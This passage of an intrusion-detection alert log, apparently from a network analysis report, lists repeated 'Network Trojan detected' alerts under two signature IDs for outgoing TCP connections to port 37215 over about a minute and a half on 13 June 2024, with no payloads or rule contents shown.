              SID:2829579
              Source Port:43260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675510
              SID:2829579
              Source Port:39664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213170
              SID:2835222
              Source Port:51770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176400
              SID:2829579
              Source Port:49894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573490
              SID:2829579
              Source Port:56040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300838
              SID:2835222
              Source Port:59808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614261
              SID:2835222
              Source Port:55262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.944072
              SID:2829579
              Source Port:55844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617831
              SID:2829579
              Source Port:51226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027894
              SID:2835222
              Source Port:43344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544806
              SID:2829579
              Source Port:45752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453829
              SID:2835222
              Source Port:45992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212547
              SID:2829579
              Source Port:41774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564887
              SID:2835222
              Source Port:43414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124746
              SID:2835222
              Source Port:33984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784767
              SID:2829579
              Source Port:59370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253350
              SID:2829579
              Source Port:53580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725027
              SID:2829579
              Source Port:37934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153517
              SID:2835222
              Source Port:46886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305823
              SID:2829579
              Source Port:36060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274054
              SID:2829579
              Source Port:55342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241207
              SID:2829579
              Source Port:42158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301964
              SID:2835222
              Source Port:57020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137730
              SID:2835222
              Source Port:37486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753286
              SID:2829579
              Source Port:40808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787787
              SID:2829579
              Source Port:43862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130958
              SID:2835222
              Source Port:55280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276628
              SID:2829579
              Source Port:58088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357343
              SID:2829579
              Source Port:37922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937176
              SID:2835222
              Source Port:42026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359291
              SID:2829579
              Source Port:48992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617805
              SID:2835222
              Source Port:40474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416500
              SID:2829579
              Source Port:49158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840166
              SID:2829579
              Source Port:47358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.247922
              SID:2835222
              Source Port:55758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487537
              SID:2829579
              Source Port:39778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123787
              SID:2835222
              Source Port:49744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278695
              SID:2835222
              Source Port:33900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130392
              SID:2829579
              Source Port:45554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486083
              SID:2829579
              Source Port:34220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418571
              SID:2835222
              Source Port:37018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278055
              SID:2829579
              Source Port:36906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978833
              SID:2835222
              Source Port:41288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801370
              SID:2835222
              Source Port:35614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371972
              SID:2829579
              Source Port:52582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092009
              SID:2829579
              Source Port:48932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456989
              SID:2829579
              Source Port:49108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174782
              SID:2835222
              Source Port:55640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308164
              SID:2835222
              Source Port:40160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416848
              SID:2829579
              Source Port:32964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728732
              SID:2835222
              Source Port:47650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440774
              SID:2835222
              Source Port:37140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060795
              SID:2835222
              Source Port:37118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480064
              SID:2829579
              Source Port:41408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632837
              SID:2829579
              Source Port:34252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012216
              SID:2829579
              Source Port:34786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913599
              SID:2835222
              Source Port:53814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195005
              SID:2835222
              Source Port:56732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676382
              SID:2829579
              Source Port:56236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884403
              SID:2835222
              Source Port:48264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568996
              SID:2829579
              Source Port:33840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726152
              SID:2829579
              Source Port:55704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756872
              SID:2835222
              Source Port:50808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301142
              SID:2835222
              Source Port:49994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093613
              SID:2829579
              Source Port:54988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303018
              SID:2829579
              Source Port:44526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404551
              SID:2835222
              Source Port:34576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912723
              SID:2835222
              Source Port:35988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605278
              SID:2835222
              Source Port:53226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503562
              SID:2829579
              Source Port:43754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502189
              SID:2829579
              Source Port:56508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547165
              SID:2829579
              Source Port:56902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177577
              SID:2829579
              Source Port:54750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507741
              SID:2829579
              Source Port:58860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.631835
              SID:2835222
              Source Port:37400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.628825
              SID:2829579
              Source Port:57214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994292
              SID:2829579
              Source Port:41378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400596
              SID:2835222
              Source Port:51188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042982
              SID:2835222
              Source Port:51812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422507
              SID:2835222
              Source Port:35806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823970
              SID:2829579
              Source Port:44836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633180
              SID:2835222
              Source Port:37614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655263
              SID:2835222
              Source Port:36052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192419
              SID:2835222
              Source Port:33444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165259
              SID:2835222
              Source Port:51658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168616
              SID:2829579
              Source Port:53526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567425
              SID:2829579
              Source Port:40990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978594
              SID:2829579
              Source Port:51420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273971
              SID:2829579
              Source Port:56718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213255
              SID:2829579
              Source Port:40634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821460
              SID:2835222
              Source Port:50472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454384
              SID:2835222
              Source Port:59640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783576
              SID:2829579
              Source Port:44574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354477
              SID:2829579
              Source Port:52178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274847
              SID:2835222
              Source Port:56784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091128
              SID:2829579
              Source Port:45156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109872
              SID:2835222
              Source Port:42114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349756
              SID:2829579
              Source Port:50544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553601
              SID:2829579
              Source Port:45276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803137
              SID:2829579
              Source Port:56400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194632
              SID:2829579
              Source Port:41584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375997
              SID:2829579
              Source Port:44524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614892
              SID:2829579
              Source Port:33064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231520
              SID:2829579
              Source Port:40924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636222
              SID:2835222
              Source Port:51668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632941
              SID:2835222
              Source Port:44836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503392
              SID:2835222
              Source Port:40440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107444
              SID:2835222
              Source Port:38052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503588
              SID:2829579
              Source Port:45828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134530
              SID:2829579
              Source Port:53262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419577
              SID:2829579
              Source Port:48340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175668
              SID:2835222
              Source Port:46326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128500
              SID:2835222
              Source Port:55448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246967
              SID:2835222
              Source Port:38474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554586
              SID:2829579
              Source Port:46122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568704
              SID:2835222
              Source Port:55526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454980
              SID:2835222
              Source Port:34378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.425001
              SID:2835222
              Source Port:48334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403247
              SID:2829579
              Source Port:59230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242656
              SID:2835222
              Source Port:58090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136474
              SID:2835222
              Source Port:39598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256748
              SID:2829579
              Source Port:42868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784535
              SID:2835222
              Source Port:56894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991738
              SID:2829579
              Source Port:59672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168916
              SID:2835222
              Source Port:55198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129938
              SID:2829579
              Source Port:42830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707693
              SID:2829579
              Source Port:37558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039000
              SID:2835222
              Source Port:54524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359895
              SID:2835222
              Source Port:60036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.295169
              SID:2829579
              Source Port:60028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659855
              SID:2829579
              Source Port:53580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222065
              SID:2829579
              Source Port:35308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756418
              SID:2835222
              Source Port:36028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505623
              SID:2829579
              Source Port:51076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995157
              SID:2835222
              Source Port:38140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.122968
              SID:2835222
              Source Port:41808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323344
              SID:2835222
              Source Port:43480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754509
              SID:2829579
              Source Port:40610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257881
              SID:2835222
              Source Port:56266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093671
              SID:2835222
              Source Port:50398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402151
              SID:2829579
              Source Port:46126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304315
              SID:2829579
              Source Port:46648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100832
              SID:2829579
              Source Port:36742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276871
              SID:2829579
              Source Port:52458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726268
              SID:2835222
              Source Port:54104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176913
              SID:2829579
              Source Port:50078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160621
              SID:2835222
              Source Port:58472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014767
              SID:2835222
              Source Port:51420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252792
              SID:2829579
              Source Port:58500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404449
              SID:2829579
              Source Port:49602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212017
              SID:2835222
              Source Port:34644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474209
              SID:2829579
              Source Port:40070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972013
              SID:2835222
              Source Port:35194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543590
              SID:2835222
              Source Port:58448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423672
              SID:2835222
              Source Port:53332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129315
              SID:2829579
              Source Port:36836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452773
              SID:2829579
              Source Port:49214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458696
              SID:2829579
              Source Port:55322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150677
              SID:2829579
              Source Port:38586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.304143
              SID:2829579
              Source Port:42262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609145
              SID:2835222
              Source Port:54414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307343
              SID:2829579
              Source Port:41238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546716
              SID:2829579
              Source Port:46202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224495
              SID:2835222
              Source Port:49756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301456
              SID:2835222
              Source Port:60190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671150
              SID:2835222
              Source Port:51448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212250
              SID:2835222
              Source Port:54728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125385
              SID:2829579
              Source Port:44114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276928
              SID:2835222
              Source Port:54642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834227
              SID:2829579
              Source Port:53482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670665
              SID:2829579
              Source Port:55610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090364
              SID:2835222
              Source Port:41184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127909
              SID:2829579
              Source Port:55334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177430
              SID:2829579
              Source Port:37692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274815
              SID:2829579
              Source Port:36142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784374
              SID:2829579
              Source Port:54112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.093868
              SID:2829579
              Source Port:49322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264488
              SID:2829579
              Source Port:39482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.782804
              SID:2829579
              Source Port:44768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544337
              SID:2835222
              Source Port:34834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633444
              SID:2829579
              Source Port:46920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872646
              SID:2835222
              Source Port:58106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057700
              SID:2829579
              Source Port:47044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608327
              SID:2829579
              Source Port:45258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989780
              SID:2829579
              Source Port:53294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454229
              SID:2835222
              Source Port:37940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457060
              SID:2829579
              Source Port:59140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543702
              SID:2829579
              Source Port:49976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356253
              SID:2829579
              Source Port:39996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239972
              SID:2835222
              Source Port:42238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990859
              SID:2829579
              Source Port:48774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889402
              SID:2829579
              Source Port:59782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128048
              SID:2829579
              Source Port:52352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092985
              SID:2829579
              Source Port:57746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707244
              SID:2829579
              Source Port:43582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419770
              SID:2835222
              Source Port:52232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.934174
              SID:2829579
              Source Port:55090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241236
              SID:2835222
              Source Port:57864
              Destination Port:37215
